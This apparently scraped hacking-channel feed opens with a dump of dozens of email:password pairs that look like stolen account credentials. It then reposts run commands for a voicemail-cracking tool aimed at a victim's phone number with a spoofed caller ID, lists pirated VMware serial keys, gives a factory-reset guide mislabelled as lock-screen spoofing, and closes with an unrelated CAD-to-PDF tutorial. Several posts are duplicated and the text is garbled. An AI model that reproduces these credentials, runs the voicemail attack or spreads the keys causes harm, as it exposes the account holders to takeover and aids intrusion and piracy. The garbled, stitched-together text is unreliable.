deperetti7@hotmail.com:sagi7dec | Expiration = 2020-10-07 17:26:30
wesleywesdude@gmail.com:wddude123 | Expiration = 2019-09-21 21:06:37
alawoeu@yahoo.fr:ua250555 | Expiration = 2020-01-14 06:16:33
danielblier@gmail.com:Dblier454 | Expiration = 2020-08-18 17:45:04
qy120838@126.com:qyxx58LBH | Expiration = 2019-10-02 13:24:25
jeroen.verberck@gmail.com:Voetballen10 | Expiration = 2022-06-08 20:46:42
ethanmsalisbury@gmail.com:Bleach12 | Expiration = 2020-05-22 12:29:18
radeck.le.panda.roux@gmail.com:Meteora23 | Expiration = 2022-05-07 12:36:13
paulenas605@gmail.com:Saulenas21 | Expiration = 2019-10-03 17:59:52
maxikangs@gmail.com:khamul33 | Expiration = 2020-08-26 12:49:49
gazmo1969@hotmail.com:southampton | Expiration = 2021-11-25 19:24:54
javallone11@gmail.com:holly123 | Expiration = 2020-04-29 18:37:52
masonice@gmail.com:whocares | Expiration = 2019-12-24 03:55:57
leadbyexample519@gmail.com:jeremiah2911 | Expiration = 2020-01-24 03:54:23
gregoryafay@gmail.com:web1530 | Expiration = 2020-01-25 00:00:00
michael.luben@gmail.com:Amethyst0 | Expiration = 2022-11-04 12:58:20
deneire84@gmail.com:july1984 | Expiration = 2024-11-01 00:22:42
patrickkleroy@gmail.com:arcs1800 | Expiration = 2020-05-09 16:31:14
rocco.reichelt@gmail.com:Superman1999 | Expiration = 2022-03-10 18:18:48
seanfrost1996@gmail.com:medusa1415 | Expiration = 2020-07-28 18:09:32
nick.yuan@gmail.com:Ny817124 | Expiration = 2020-04-01 23:14:32
borisgr.od@gmail.com:7336406s | Expiration = 2019-09-21 19:46:58
georgewrestler@yahoo.com:pedrolopez1 | Expiration = 2020-01-18 00:00:00
mariana.savage@gmail.com:harthill | Expiration = 2022-03-06 00:32:56
higsqb7@gmail.com:Maxwell07 | Expiration = 2020-02-05 23:25:14
conmaninhawaii@gmail.com:cloudstrife7 | Expiration = 2022-01-28 00:42:04
jourdahndavid@gmail.com:arya118251 | Expiration = 2019-09-29 15:42:48
hodge45@gmail.com:Chewbacca45 | Expiration = 2022-08-09 00:31:07
crow.stephen@gmail.com:savior11 | Expiration = 2020-08-08 04:05:16
ransley77@gmail.com:dingo101 | Expiration = 2020-01-30 13:20:37
tsherman219@gmail.com:tristan123 | Expiration = 2022-02-03 17:46:39
jaredgrant101@gmail.com:Alexander123 | Expiration = 2020-04-21 22:43:48
sbarr531@gmail.com:99Basketball | Expiration = 2021-03-12 16:58:25
starjosie777@gmail.com:Kitty101 | Expiration = 2021-05-25 14:49:38
herregud1989@outlook.com:Pellekanin1 | Expiration = 2019-09-30 04:25:16
rjeff24@gmail.com:Password90 | Expiration = 2022-04-30 18:14:06
troynickerson@gmail.com:FuckTh1s | Expiration = 2022-06-26 02:42:51
jft.jenkins@gmail.com:07091998Jft | Expiration = 2019-11-09 00:55:57
jcrouch764@gmail.com:thunder3 | Expiration = 2020-08-14 00:03:17
noodlejon@yahoo.com:Balto1925 | Expiration = 2019-11-23 02:35:37
benz_47@hotmail.com:1qaz@WSX | Expiration = 2020-07-08 01:09:16
nico.grusse@gmail.com:Tgdobyboloss94! | Expiration = 2022-09-09 13:38:12
deperetti7@hotmail.com:sagi7dec | Expiration = 2020-10-07 17:26:30
wesleywesdude@gmail.com:wddude123 | Expiration = 2019-09-21 21:06:37
alawoeu@yahoo.fr:ua250555 | Expiration = 2020-01-14 06:16:33
danielblier@gmail.com:Dblier454 | Expiration = 2020-08-18 17:45:04
qy120838@126.com:qyxx58LBH | Expiration = 2019-10-02 13:24:25
jeroen.verberck@gmail.com:Voetballen10 | Expiration = 2022-06-08 20:46:42
ethanmsalisbury@gmail.com:Bleach12 | Expiration = 2020-05-22 12:29:18
radeck.le.panda.roux@gmail.com:Meteora23 | Expiration = 2022-05-07 12:36:13
paulenas605@gmail.com:Saulenas21 | Expiration = 2019-10-03 17:59:52
maxikangs@gmail.com:khamul33 | Expiration = 2020-08-26 12:49:49
gazmo1969@hotmail.com:southampton | Expiration = 2021-11-25 19:24:54
javallone11@gmail.com:holly123 | Expiration = 2020-04-29 18:37:52
masonice@gmail.com:whocares | Expiration = 2019-12-24 03:55:57
leadbyexample519@gmail.com:jeremiah2911 | Expiration = 2020-01-24 03:54:23
gregoryafay@gmail.com:web1530 | Expiration = 2020-01-25 00:00:00
michael.luben@gmail.com:Amethyst0 | Expiration = 2022-11-04 12:58:20
deneire84@gmail.com:july1984 | Expiration = 2024-11-01 00:22:42
patrickkleroy@gmail.com:arcs1800 | Expiration = 2020-05-09 16:31:14
rocco.reichelt@gmail.com:Superman1999 | Expiration = 2022-03-10 18:18:48
seanfrost1996@gmail.com:medusa1415 | Expiration = 2020-07-28 18:09:32
nick.yuan@gmail.com:Ny817124 | Expiration = 2020-04-01 23:14:32
borisgr.od@gmail.com:7336406s | Expiration = 2019-09-21 19:46:58
georgewrestler@yahoo.com:pedrolopez1 | Expiration = 2020-01-18 00:00:00
mariana.savage@gmail.com:harthill | Expiration = 2022-03-06 00:32:56
higsqb7@gmail.com:Maxwell07 | Expiration = 2020-02-05 23:25:14
conmaninhawaii@gmail.com:cloudstrife7 | Expiration = 2022-01-28 00:42:04
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Simple tool Compromising online accounts by cracking voicemail systems".
twitter.com/UNdercOdeTC
π¦ ππΌππ πππΈβπ :
voicemailautomator supports two actions:
> "message" - retrieves and records the newest message in the
voicemail system. It returns a URL with the recording.
> "greeting" - changes the greeting message to specific DTMF tones
It uses webhooks to obtain information about the ongoing calls and act accordingly. It starts a Webserver on localhost:8080 and uses localhost.me service to reach the machine running the script.
1) git clone https://github.com/martinvigo/voicemailautomator
2) go dir then
3) You will need a funded Twilio account, setup TwiML bins and configure localtunnel.me to accept Webhooks. Check the "Twilio setup" section in the script and add the missing information
account_sid = "" # Obtain from Twilio
auth_token = "" # Obtain from Twilio
twimlPayloadChangeGreeting = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
twimlPayloadChangeGetNewestMessage = "" # <?xml version="1.0" encoding="UTF-8"?><Response><Pause length="10"/><Hangup/></Response>
status_callback_url = "" # Obtain from localtunnel.me
4) python voicemailcracker.py message --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000
5) python voicemailcracker.py greeting --victimnumber 5555555555 --carrier tmobile --callerid 4444444444 --backdoornumber 3333333333 --pin 0000 --payload 1234
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Twitter
UNDERCODE TESTING COMPANY (@UnderCodeTC) | Twitter
The latest Tweets from UNDERCODE TESTING COMPANY (@UnderCodeTC). πΈππ§πππππ & πΈππ¨ππͺπ€ ππ‘πππ₯ππ. Lebanon-North
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ VMware Workstation 15.x.x serial key- from git & tested by UnderCode
Serial Keys:
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
>FU512-2DG1H-M85QZ-U7Z5T-PY8ZD
> CU3MA-2LG1N-48EGQ-9GNGZ-QG0UD
>GV7N2-DQZ00-4897Y-27ZNX-NV0TD
> YZ718-4REEQ-08DHQ-JNYQC-ZQRD0
>GZ3N0-6CX0L-H80UP-FPM59-NKAD4
>YY31H-6EYEJ-480VZ-VXXZC-QF2E0
>ZG51K-25FE1-H81ZP-95XGT-WV2C0
>VG30H-2AX11-H88FQ-CQXGZ-M6AY4
> CU7J2-4KG8J-489TY-X6XGX-MAUX2
>FY780-64E90-0845Z-1DWQ9-XPRC0
>UF312-07W82-H89XZ-7FPGE-XUH80
>AA3DH-0PYD1-0803P-X4Z7V-PGHR4
@UndercOdeTesting
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Spoof Lock Screen [Settings guide)easy and fast :
pinterest.com/UndercOdeOfficial
π¦ ππΌππ πππΈβπ :
1) Since many people do not operate the problem of spoof lock screens in computer systems, I want to help everyone solve the problem of spoof lock screens, so how should we specifically deal with spoof lock screens? In fact,
> just follow the steps below: first turn the phone off. 2: press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter the Recovery mode.
1) Turn the phone off first
2) Press and hold the "power button" and "volume up + button" at the same time to turn on the phone and enter Recovery mode (at this time, a "!" And "mobile phone" logo appears on my phone)
3 ) Next, press the "power-on key" three times in a row, it must be slow. When you press the third time, do not release it, and then press "Volume increase +" (I enter the menu option on my mobile phone)
4) Select the "wipe data / factory reset" option (Note: Use the "Volume switch" key to select the menu option, and the "Power key" is the confirmation key)
5) After entering the "wipe data / factory reset" option, select the "Yes--delete all user data" option and press the power button to confirm. (Note: After the cleaning is completed, the system will return to the menu options)
6)After returning to the "Menu" option, select "wipe cache partition" to cl ear the cache partition in the phone. Press the "Power button" to confirm (Note: This step is optional or not)
7) After returning to the "Menu" option, select "reboot system now" (restart the phone) and press the "power button" to confirm (note: there is no drawing unlock after system restart);
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ cad export pdf [governance essentials] easy and fast tutorial :
twitter.com/UndercOdeTC
π¦ ππΌππ πππΈβπ :
Many people do not operate the computer system to deal with the problem of cad exporting pdf, so I want to help you solve the problem of cad exporting pdf. So how should you deal with cad exporting pdf? In fact, just follow 1: Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
1) Open CAD, find the CAD drawing you want to export, then select the file in the upper left corner and select print
2) Select the PDF format from the printer
3) Select the exported size
4) Tick the sheet full of options, print in the middle, and print horizontally
5) Print range selection window, jump back to the CAD drawing you want to export
6) Select the drawing to be exported from the frame, and select the frame from the upper left corner to the lower right corner, which is the range to be printed. Then you can click the preview to see
7) Then you can click the preview to see, no problem, you can click OK, and the PDF format will come out.
Written by UndercOde
β β β ο½ππ»βΊπ«Δπ¬πβ β β β